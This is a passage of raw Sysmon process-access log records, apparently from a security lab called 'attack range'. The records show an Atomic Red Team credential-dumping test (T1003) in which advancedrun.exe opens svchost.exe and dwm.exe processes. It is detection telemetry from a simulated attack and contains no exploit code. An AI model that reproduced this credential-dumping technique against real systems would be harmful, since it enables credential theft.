icRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979960Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979959Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979958Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979957Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979956Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979954Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979953Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003979947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003979943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 